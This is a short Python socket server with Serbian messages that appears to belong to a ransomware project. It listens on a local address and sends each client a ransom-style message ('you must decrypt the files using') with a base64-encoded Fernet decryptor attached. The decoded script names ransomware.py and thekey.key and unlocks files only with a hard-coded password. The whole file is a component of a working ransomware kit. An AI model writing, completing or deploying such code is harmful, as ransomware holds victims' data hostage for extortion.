import socket
import os

IP = "192.168.0.29"
PORT = 8000

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

host = '192.168.0.29'
port = 12345

s.bind((host,port))

s.listen(5)

print("Ceka se konekcija\n")

while True:
	c,addr = s.accept()
	print(f'Uspostavljena konekcija sa {addr}')
	c.send(b'Moras dekriptovati fajlove koristeci \n aW1wb3J0IG9zCmZyb20gY3J5cHRvZ3JhcGh5LmZlcm5ldCBpbXBvcnQgRmVybmV0CgpmaWxlcyA9IFtdCgpmb3IgZmlsZSBpbiBvcy5saXN0ZGlyKCk6CiAgICBpZiBmaWxlID09ICJyYW5zb213YXJlLnB5IiBvciBmaWxlID09ICJ0aGVrZXkua2V5IiBvciBmaWxlID09ICJkZWNyeXB0LnB5IjoKICAgICAgICAgICAgY29udGludWUKICAgIGlmIG9zLnBhdGguaXNmaWxlKGZpbGUpOgogICAgICAgICAgICBmaWxlcy5hcHBlbmQoZmlsZSkKICAgICAgICAKcHJpbnQoZmlsZXMpCgp3aXRoIG9wZW4oInRoZWtleS5rZXkiLCAicmIiKSBhcyBrZXk6CiAgICAgICAgc2VjcmV0a2V5ID0ga2V5LnJlYWQoKQoKc2VjcmV0cGFzc3dvcmQgPSAic2lmcmExMjMiCgp1c2VyX3BocmFzZSA9IGlucHV0KCJVbmVzaXRlIGlzcHJhdm51IGxvemlua3Uga2FrbyBiaSBkZWtyaXB0b3ZhbmkgdmFzZSBmYWpsb3ZlXG4iKQoKaWYgdXNlcl9waHJhc2UgPT0gc2VjcmV0cGFzc3dvcmQ6CiAgICAgICAgZm9yIGZpbGUgaW4gZmlsZXM6CiAgICAgICAgICAgICAgICB3aXRoIG9wZW4oZmlsZSwgInJiIikgYXMgdGhlZmlsZToKICAgICAgICAgICAgICAgICAgICAgICAgY29udGVudHMgPSB0aGVmaWxlLnJlYWQoKQogICAgICAgICAgICAgICAgY29udGVudHNfZGVjcnlwdGVkID0gRmVybmV0KHNlY3JldGtleSkuZGVjcnlwdChjb250ZW50cykKICAgICAgICAgICAgICAgIHdpdGggb3BlbihmaWxlLCAid2IiKSBhcyB0aGVmaWxlOgogICAgICAgICAgICAgICAgICAgICAgICB0aGVmaWxlLndyaXRlKGNvbnRlbnRzX2RlY3J5cHRlZCkKICAgICAgICAgICAgICAgIHByaW50KCJGYWpsb3ZpIHN1IGRla3JpcHRvdmFuaSEiKQoKZWxzZToKICAgICAgICBwcmludCgiUG9ncmVzbmEgbG96aW5rYSIpCgo= ')



c.close()
